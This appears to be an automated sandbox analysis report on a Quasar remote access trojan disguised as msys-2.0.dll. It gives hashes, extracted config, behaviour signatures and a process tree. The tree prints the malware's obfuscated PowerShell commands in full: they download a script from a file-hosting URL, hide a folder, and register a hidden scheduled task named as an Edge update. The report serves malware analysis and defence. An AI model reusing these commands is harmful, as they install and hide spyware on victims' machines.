quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
100s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

msys-2.0.dll
Size

88KB
MD5

f947218a2b6bc294c22175030824c12b
SHA1

ba97c647a21d78f4d70135231574a9162998a3bf
SHA256

940d104b54c78abc2ab4af8d88c0da0083dda6ddf63e92976d96fadcf46d35c4
SHA512

46cb9b32a5bc07fb55fded5e42bbc8362ba0106d19c4441a639a821cd612867f676017d525d167384c9595b506db2d7a6f2ac8fa2d2c7fe102ede7b6132cd6e5
SSDEEP

1536:gsssTDMfCgjgibbqJ7tJ2Lr/lWzv0EH80OrxECICtf1eL5eim:hsOo6yOJRJ2X/czv0EH80OrxE9Ctf1eC

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral9/memory/3892-55-0x0000012888640000-0x00000128887CE000-memory.dmp	family_quasar

Blocklisted process makes network request 5 IoCs

flow	pid	Process
2	3168	powershell.exe
4	3892	powershell.exe
5	3892	powershell.exe
6	3892	powershell.exe
7	3892	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3344	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3892	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3344	powershell.exe
3344	powershell.exe
3168	powershell.exe
3168	powershell.exe
3892	powershell.exe
3892	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5236	rundll32.exe
Token: SeBackupPrivilege	5236	rundll32.exe
Token: SeDebugPrivilege	5236	rundll32.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeIncreaseQuotaPrivilege	3344	powershell.exe
Token: SeSecurityPrivilege	3344	powershell.exe
Token: SeTakeOwnershipPrivilege	3344	powershell.exe
Token: SeLoadDriverPrivilege	3344	powershell.exe
Token: SeSystemProfilePrivilege	3344	powershell.exe
Token: SeSystemtimePrivilege	3344	powershell.exe
Token: SeProfSingleProcessPrivilege	3344	powershell.exe
Token: SeIncBasePriorityPrivilege	3344	powershell.exe
Token: SeCreatePagefilePrivilege	3344	powershell.exe
Token: SeBackupPrivilege	3344	powershell.exe
Token: SeRestorePrivilege	3344	powershell.exe
Token: SeShutdownPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeSystemEnvironmentPrivilege	3344	powershell.exe
Token: SeRemoteShutdownPrivilege	3344	powershell.exe
Token: SeUndockPrivilege	3344	powershell.exe
Token: SeManageVolumePrivilege	3344	powershell.exe
Token: 33	3344	powershell.exe
Token: 34	3344	powershell.exe
Token: 35	3344	powershell.exe
Token: 36	3344	powershell.exe
Token: SeIncreaseQuotaPrivilege	3344	powershell.exe
Token: SeSecurityPrivilege	3344	powershell.exe
Token: SeTakeOwnershipPrivilege	3344	powershell.exe
Token: SeLoadDriverPrivilege	3344	powershell.exe
Token: SeSystemProfilePrivilege	3344	powershell.exe
Token: SeSystemtimePrivilege	3344	powershell.exe
Token: SeProfSingleProcessPrivilege	3344	powershell.exe
Token: SeIncBasePriorityPrivilege	3344	powershell.exe
Token: SeCreatePagefilePrivilege	3344	powershell.exe
Token: SeBackupPrivilege	3344	powershell.exe
Token: SeRestorePrivilege	3344	powershell.exe
Token: SeShutdownPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeSystemEnvironmentPrivilege	3344	powershell.exe
Token: SeRemoteShutdownPrivilege	3344	powershell.exe
Token: SeUndockPrivilege	3344	powershell.exe
Token: SeManageVolumePrivilege	3344	powershell.exe
Token: 33	3344	powershell.exe
Token: 34	3344	powershell.exe
Token: 35	3344	powershell.exe
Token: 36	3344	powershell.exe
Token: SeIncreaseQuotaPrivilege	3344	powershell.exe
Token: SeSecurityPrivilege	3344	powershell.exe
Token: SeTakeOwnershipPrivilege	3344	powershell.exe
Token: SeLoadDriverPrivilege	3344	powershell.exe
Token: SeSystemProfilePrivilege	3344	powershell.exe
Token: SeSystemtimePrivilege	3344	powershell.exe
Token: SeProfSingleProcessPrivilege	3344	powershell.exe
Token: SeIncBasePriorityPrivilege	3344	powershell.exe
Token: SeCreatePagefilePrivilege	3344	powershell.exe
Token: SeBackupPrivilege	3344	powershell.exe
Token: SeRestorePrivilege	3344	powershell.exe
Token: SeShutdownPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeSystemEnvironmentPrivilege	3344	powershell.exe
Token: SeRemoteShutdownPrivilege	3344	powershell.exe
Token: SeUndockPrivilege	3344	powershell.exe
Token: SeManageVolumePrivilege	3344	powershell.exe
Token: 33	3344	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3892	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 5236 wrote to memory of 3392	5236	rundll32.exe	83
PID 5236 wrote to memory of 3392	5236	rundll32.exe	83
PID 3392 wrote to memory of 4016	3392	cmd.exe	85
PID 3392 wrote to memory of 4016	3392	cmd.exe	85
PID 4016 wrote to memory of 5028	4016	winAPI.dll	86
PID 4016 wrote to memory of 5028	4016	winAPI.dll	86
PID 5028 wrote to memory of 4980	5028	cmd.exe	87
PID 5028 wrote to memory of 4980	5028	cmd.exe	87
PID 4980 wrote to memory of 3712	4980	cmd.exe	88
PID 4980 wrote to memory of 3712	4980	cmd.exe	88
PID 4980 wrote to memory of 3344	4980	cmd.exe	89
PID 4980 wrote to memory of 3344	4980	cmd.exe	89
PID 4980 wrote to memory of 3168	4980	cmd.exe	91
PID 4980 wrote to memory of 3168	4980	cmd.exe	91
PID 4980 wrote to memory of 3892	4980	cmd.exe	93
PID 4980 wrote to memory of 3892	4980	cmd.exe	93
PID 3892 wrote to memory of 3060	3892	powershell.exe	94
PID 3892 wrote to memory of 3060	3892	powershell.exe	94
PID 3060 wrote to memory of 5952	3060	csc.exe	95
PID 3060 wrote to memory of 5952	3060	csc.exe	95

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3712	attrib.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msys-2.0.dll,#1
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3392
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5028
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4980
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:3712
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3344
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:3168
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3892
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gs1o34cl\gs1o34cl.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3060
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5CF0.tmp" "c:\Users\Admin\AppData\Local\Temp\gs1o34cl\CSCC6079533DBDF4A8A9B9AE55A1A6ED88C.TMP"
        8⤵
        
        PID:5952

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4dcb591f64c5a200feded5b3963da678

SHA1
77c4941ac998d3cc3e55f74b0a152b7138e2fb67

SHA256
1fbd242d477324cd00b4eca95abe8d353ce7fb4898e7fcbd8b579c48dfb598b7

SHA512
08d81df9bbfea221341f7d79dab541957b618a2690657b3448b5ffb9f4e5b4b2eb4ea00188e6a071aa41e09e38c2242299c8f0027261a39cece900fc09a4dce3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
78f7e511da7ae9eff6118a6b44d02292

SHA1
bcbd156c3921d12bb7c9a77a0771c2112fb17d94

SHA256
7efff9170db36d8b5f0b469bbc83b40cd415d1c4ea4eaab77e95894a66a3c9fa

SHA512
bbe26b4701e7e3bbb23a432fffbfaa28abe3f20ec527902480273e6da5c7710fdd11a7c80c928fcd9bd738893854fffa76eb099cc9d51fc923fe6dabfe6a53ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5CF0.tmp

Filesize
1KB

MD5
47bc17dab01bfa392d8e1a792f7fc0db

SHA1
e52a080fe9e93d396d3a8651eb46755ae10e6fbe

SHA256
560bc2dd19d77dc488e558b7c9ea8e7311ac88ce9898c0243bc0796bb950dd9b

SHA512
dc5e36c2d29386b84192181a6974bd32bc294e5467e89e34813b6fe38470602afbcc6a56c02f5f404d799391a8186ad5ef322a8878bd876b1a059b42cd7a5f79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmuhrpgj.rxx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gs1o34cl\gs1o34cl.dll

Filesize
3KB

MD5
1d57145408107295b15d1af78381e8d9

SHA1
e257ec3845a9ee6aa944ac653c6b00d040f3c957

SHA256
26de60b788426985df02e2b198105e4b2c543d864d15aab4d446a0efb469d8da

SHA512
274c185fc5f96f90c6364136a6df2d90bbd4efba593881d4e85842d2fc918c95774c3f7cf673042f861788bcb29f3746d4e958f31d814e46d0074215b91ed8b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gs1o34cl\CSCC6079533DBDF4A8A9B9AE55A1A6ED88C.TMP

Filesize
652B

MD5
22cc65e88629fef845b8010bd4506d9b

SHA1
514d2ff501d5201041ee29e40e87fdb14d63eb6e

SHA256
e7032b9df00d7f85fd3d5dd4d05de3a7c8b115953b28bdfd2a68c8004d0da0f1

SHA512
96f8fd9682cc8e53d307c55ddf02e1ca6676e50ba1343d8e5cb81a68fa00df997d2e3d0ef84f41f88824d005e714297e23769c9fd261e3a6d354b9027d410d04

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gs1o34cl\gs1o34cl.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gs1o34cl\gs1o34cl.cmdline

Filesize
369B

MD5
c8cafe7e844eeafaa9940a8156913d39

SHA1
92312779a6a6a39845e22c1aad436c15c760e81d

SHA256
2927a69257396892053b8d6ad7b1b0dec14ec39b63c06cf36f8651e56d53b806

SHA512
5ea5001f5af2202afba36b91ee5985304f671065a3dbcc0f6c706e291a66eb82a442203be44a72ce778c1743abb5f5263af6c41d193bae6529e89c4e88a7ec03

Download Submit
memory/3344-6-0x00000125ADB40000-0x00000125ADB62000-memory.dmp

Filesize
136KB

Download
memory/3892-60-0x00000128FD020000-0x00000128FD0D2000-memory.dmp

Filesize
712KB

Download
memory/3892-58-0x00000128885C0000-0x00000128885FA000-memory.dmp

Filesize
232KB

Download
memory/3892-68-0x00000128ECEF0000-0x00000128ECF2C000-memory.dmp

Filesize
240KB

Download
memory/3892-53-0x0000012888020000-0x000001288818A000-memory.dmp

Filesize
1.4MB

Download
memory/3892-55-0x0000012888640000-0x00000128887CE000-memory.dmp

Filesize
1.6MB

Download
memory/3892-56-0x00000128884B0000-0x00000128884CA000-memory.dmp

Filesize
104KB

Download
memory/3892-57-0x00000128885B0000-0x00000128885C2000-memory.dmp

Filesize
72KB

Download
memory/3892-67-0x00000128C44C0000-0x00000128C44D2000-memory.dmp

Filesize
72KB

Download
memory/3892-59-0x00000128ECE60000-0x00000128ECEB0000-memory.dmp

Filesize
320KB

Download
memory/3892-51-0x0000012888000000-0x0000012888008000-memory.dmp

Filesize
32KB

Download
memory/3892-61-0x0000012888CC0000-0x0000012888D0E000-memory.dmp

Filesize
312KB

Download
memory/3892-62-0x0000012888D10000-0x0000012888D5C000-memory.dmp

Filesize
304KB

Download
memory/3892-64-0x0000012888600000-0x000001288862A000-memory.dmp

Filesize
168KB

Download
memory/3892-63-0x0000012888D60000-0x0000012888DAA000-memory.dmp

Filesize
296KB

Download
memory/5236-2-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/5236-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download